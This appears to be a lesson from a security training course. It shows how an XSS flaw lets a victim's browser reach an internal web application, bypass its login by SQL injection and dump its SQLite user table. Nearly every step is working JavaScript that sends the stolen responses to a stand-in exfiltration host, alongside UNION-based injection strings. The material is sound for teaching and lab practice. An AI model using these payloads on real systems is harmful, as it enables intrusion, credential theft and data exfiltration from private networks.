Exploiting internal Web Applications I

---

In the last section, we discussed using an XSS vulnerability to exfiltrate data from internal web applications. In this section, we will use the XSS vulnerability to identify and exploit a security vulnerability in an entirely different web application located within the victim's private network.

---

Identifying the Vulnerability

We will start with the same base XSS payload used in the previous sections and the exfiltration of the /admin.php endpoint. We will omit it here since we discussed the corresponding payload in the previous sections.

When the victim triggers the XSS vulnerability, the response is exfiltrated to the exfiltration server. We can see that the admin endpoint contains a reference to an internal web application at http://internal.vulnerablesite.htb:

If we attempt to access the page directly, we are blocked:

Thus, let us use the XSS vulnerability to enumerate the web application just like we did with the internal API in the last section. We will start by exfiltrating the index of the web application:

var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://internal.vulnerablesite.htb/', false);
xhr.send();

var exfil = new XMLHttpRequest();
exfil.open("GET", "http://exfiltrate.htb/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();

This reveals that the internal web application is protected by authentication, as the index consists of a login form:

The XSS vulnerability enables us to interact with the internal web application fully. We could try default passwords or brute-force additional endpoints. However, this section will focus on a SQL injection vulnerability. From the login form, we can construct a valid login POST request that the internal web application accepts. Let us try a simple SQL injection by sending a username that contains a single quote:

var xhr = new XMLHttpRequest();
var params = `uname=${encodeURIComponent("'test")}&pass=x`;
xhr.open('POST', 'http://internal.vulnerablesite.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);

var exfil = new XMLHttpRequest();
exfil.open("GET", "http://exfiltrate.htb/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();

This results in the following response, confirming that the internal web application is vulnerable to SQL injection:

HTTP 500 - SQL Error

---

Exploiting the Vulnerability

We will exploit the SQL injection vulnerability by bypassing the login and dumping the database.

We will start with bypassing the authentication, which we can achieve with the username ' OR '1'='1'-- -:

var xhr = new XMLHttpRequest();
var params = `uname=${encodeURIComponent("' OR '1'='1' -- -")}&pass=x`;
xhr.open('POST', 'http://internal.vulnerablesite.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);

var exfil = new XMLHttpRequest();
exfil.open("GET", "http://exfiltrate.htb/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();

This reveals the following information in the post-login screen:

(1, 'admin', 'InternalAdmin2023!', 'This is the default admin account.')

The data looks like a username, password, and account description. Let us confirm this by dumping the entire user table. We can detect the database system by enumerating common payloads like any other SQL injection vulnerability. In our case, we are dealing with a SQLite database. Since there seem to be four columns in the output, we can use the following payload to dump all tables:

var xhr = new XMLHttpRequest();
var params = `uname=${encodeURIComponent("' UNION SELECT 1,2,3,group_concat(tbl_name) FROM sqlite_master-- -")}&pass=x`;
xhr.open('POST', 'http://internal.vulnerablesite.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);

var exfil = new XMLHttpRequest();
exfil.open("GET", "http://exfiltrate.htb/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();

Subsequently, we can dump the schema of the users table:

var xhr = new XMLHttpRequest();
var params = `uname=${encodeURIComponent("' UNION SELECT 1,2,3,group_concat(sql) FROM sqlite_master WHERE name='users'-- -")}&pass=x`;
xhr.open('POST', 'http://internal.vulnerablesite.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);

var exfil = new XMLHttpRequest();
exfil.open("GET", "http://exfiltrate.htb/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();

This reveals the following database schema:

CREATE TABLE `users` (
	`id` int(11) NOT NULL,
	`username` varchar(256) NOT NULL,
	`password` longtext NOT NULL,
	`info` longtext NOT NULL
)

Lastly, we can dump the users table iteratively with the following payload:

var xhr = new XMLHttpRequest();
var params = `uname=${encodeURIComponent("' UNION SELECT id,username,password,info FROM users-- -")}&pass=x`;
xhr.open('POST', 'http://internal.vulnerablesite.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);

var exfil = new XMLHttpRequest();
exfil.open("GET", "http://exfiltrate.htb/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();

We can also dump other tables in the database with the same methodology. This shows how powerful an XSS vulnerability is, as it allows us to target vulnerable web applications normally inaccessible by an external attacker. Since the payload is executed in the victim's browser, internal web applications can be accessed and thus targeted as well. For more details on SQL injection vulnerabilities, check out the Advanced SQL Injections module.